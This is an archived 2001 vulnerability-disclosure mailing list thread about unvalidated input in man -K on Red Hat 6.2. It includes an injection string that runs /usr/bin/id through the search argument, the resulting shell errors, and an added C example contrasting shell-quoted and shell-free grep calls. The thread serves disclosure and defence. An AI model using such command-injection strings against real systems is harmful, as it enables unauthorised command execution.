Vulnerability Development mailing list archives
Re: man -K input validation
From: Reb <reb () openrecords org>
Date: Wed, 21 Feb 2001 00:39:26 -0600
When I do the following on a Redhat 6.2 on 2.2.14:

man -K "';`/usr/bin/id`"

I get repeatedly until I ctrl-c out of it:

sh: -c: line 1: `grep -q '';uid=501(reb) gid=501(reb) groups=501(reb)' /usr/man/ man3/Tk_DeleteSelHandler.3'
sh: syntax error near unexpected token `;uid=501(r'
sh: -c: line 1: `grep -q '';uid=501(reb) gid=501(reb) groups=501(reb)' /usr/man/ man3/DeleteImg.3'
sh: syntax error near unexpected token `;uid=501(r'
sh: -c: line 1: `grep -q '';uid=501(reb) gid=501(reb) groups=501(reb)' /usr/man/ man3/Tk_DeleteImage.3'

Reb

-----Original Message-----
From: VULN-DEV List [mailto:VULN-DEV () SECURITYFOCUS COM]On Behalf Of Rasta C. Shell
Sent: Tuesday, February 20, 2001 8:54 AM
To: VULN-DEV () SECURITYFOCUS COM
Subject: man -K input validation

I don't know if this will be of any interest since I don't think it can give you man uid/gid, but while looking at the man source code to see what's seg-faulting the -K <longbuff> (didn't find anything, maybe it's the grep that faults?) I notice that the -K <input> line is not being validated before calling system, so a:

man -K "';`/usr/bin/id`"

will run /usr/bin/id by man for you. Luckily there's a setuid/gid call before system.

--
http://www.rshell.org
Join #shellcode on EFnet.
rasta () rshell org
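The quoting failure visible in the error output above, next to a shell-free way to run the same search, as an added example that is not part of either post and is not man's source code. The function names, the file name page.3 and the temporary-file helper are hypothetical, and it assumes grep is on PATH.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Pattern as it appears inside the grep command in the error output above. */
static const char SAMPLE[] = "';uid=501(reb) gid=501(reb) groups=501(reb)";

/* Unsafe shape: the pattern is pasted between single quotes of a shell
 * command. The string is only built for inspection, never run here. */
int build_shell_command(char *out, size_t n, const char *pat, const char *file) {
    return snprintf(out, n, "grep -q '%s' %s", pat, file);
}

/* Safer shape: no shell. The pattern is a single argv element, so quotes,
 * semicolons and backticks in it are plain data to grep.
 * Returns grep's exit status (0 match, 1 no match) or -1 on error. */
int grep_quiet_noshell(const char *pat, const char *file) {
    int status;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execlp("grep", "grep", "-q", "-e", pat, "--", file, (char *)NULL);
        _exit(127); /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Hypothetical helper: writes text to a temp file and searches it for pat. */
int search_text(const char *pat, const char *text) {
    char path[] = "/tmp/mank-demo-XXXXXX";
    int rc = -1, fd = mkstemp(path);
    if (fd < 0) return -1;
    if (write(fd, text, strlen(text)) >= 0) rc = grep_quiet_noshell(pat, path);
    close(fd);
    unlink(path);
    return rc;
}

int main(void) {
    char cmd[256];
    build_shell_command(cmd, sizeof cmd, SAMPLE, "page.3");
    printf("%s\nno-shell grep exit: %d\n", cmd, search_text(SAMPLE, SAMPLE));
    return 0;
}
```

The built string reproduces the `grep -q '';uid=...'` line from the output: the leading quote in the pattern closes the quoted region, which is why sh reports a syntax error at `;uid=501(r`.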